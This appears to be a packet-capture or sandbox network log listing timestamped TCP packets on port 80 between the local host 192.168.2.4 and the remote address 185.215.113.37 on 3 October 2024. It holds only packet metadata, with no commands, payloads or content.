Oct 3, 2024 18:38:21.526993036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527034044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527252913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527285099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527307987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527333021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527443886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527477026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527497053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527540922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527554989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527587891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527620077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527647018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527651072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527683020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527684927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527717113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527719975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527735949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527753115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527766943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527786016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.527801037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.527836084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.528148890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528198004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528230906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528256893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.528264046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528295040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.528327942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.528350115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528383970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528405905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.528414965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528440952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.528449059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528476000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.528477907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528495073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.528522015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.528528929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528563023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528575897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.528626919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.528640985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528680086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.528728008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529189110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529246092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529359102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529392004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529409885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529426098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529443979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529459000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529483080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529509068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529515982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529541016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529571056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529584885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529603004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529623985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529632092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529656887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529680014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529717922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529751062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529767036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529784918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.529814959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.529846907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.530344009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.530376911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.530396938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.530407906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.530440092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.530461073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.530522108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.530581951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.530596018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.530627966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.530647993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.530664921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.530682087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.530699015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.530714035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.530730963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.530756950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.530785084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.530834913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.530900002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.531053066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531086922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531126022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.531156063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.531229019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531260967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531275034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.531294107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531311989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.531327009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531342030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.531361103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531385899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.531421900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.531428099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531460047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531491995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531516075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.531522989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531557083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.531563044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.531609058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.531996012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.532044888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.532052040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.532078028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.532093048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.532113075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.532145977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.532150030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.532174110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.532183886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.532217979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.532219887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.532253027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.532253981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.532280922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.532286882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.532315969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.532347918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.589045048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589063883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589081049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589121103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.589164972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.589255095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589274883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589289904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589313030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589320898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.589332104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589345932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589356899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.589363098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589379072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.589449883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.589483023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589498997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589513063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589528084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589540958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589556932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589574099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.589612961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.589628935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.589677095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.590435982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.590451956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.590466976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.590504885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.590563059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.590682983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.590737104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.616765022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.616830111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.616930962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.616949081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.616993904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.617115021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617130995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617145061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617161036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617168903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.617208958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.617371082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617388010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617402077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617419004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617432117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.617435932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617471933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.617501974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.617726088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617741108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617755890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617777109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.617795944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.617893934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617908955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617923021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.617950916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.617965937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.618274927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.618290901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.618305922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.618319988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.618335962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.618343115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.618379116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.618454933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.618470907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.618484974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.618504047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.618505001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.618519068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.618541956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.618576050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.618972063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619031906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.619144917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619160891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619178057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619191885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619203091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.619208097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619223118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619230032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.619302034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.619688988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619704008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619719028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619733095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619762897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.619796038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.619837046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619852066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619867086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619884968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.619887114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.619925976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.661339998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.667005062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.884911060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.884941101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.884958982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.884980917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.884996891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885013103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885029078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885046005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885080099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.885339975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885358095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885373116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885379076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.885379076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.885390043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885406017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885421991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885437012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885440111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.885440111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.885453939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885469913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885499954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.885499954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.885570049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.885878086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885894060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885909081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885925055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.885938883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886010885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.886010885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.886190891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886207104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886223078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886239052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886255980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886264086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.886301994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.886327028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.886707067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886723042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886738062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886754036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886768103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886784077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886794090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.886801004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886816978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886832952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886847973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886852980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.886852980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.886864901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.886900902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.886935949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.887399912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887422085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887438059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887453079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887468100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887481928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887506008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.887545109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.887747049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887763023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887778997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887806892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.887875080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.887878895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887896061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887911081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887928009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887942076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887958050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887974024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.887989044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.887989044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.887990952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888009071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888015985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.888072014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.888072014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.888804913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888822079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888837099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888851881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888866901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888884068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888899088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888914108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.888914108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.888915062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888931036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888946056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888961077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.888976097 CEST	80	49730	185.215.113.37	192.168.2.4
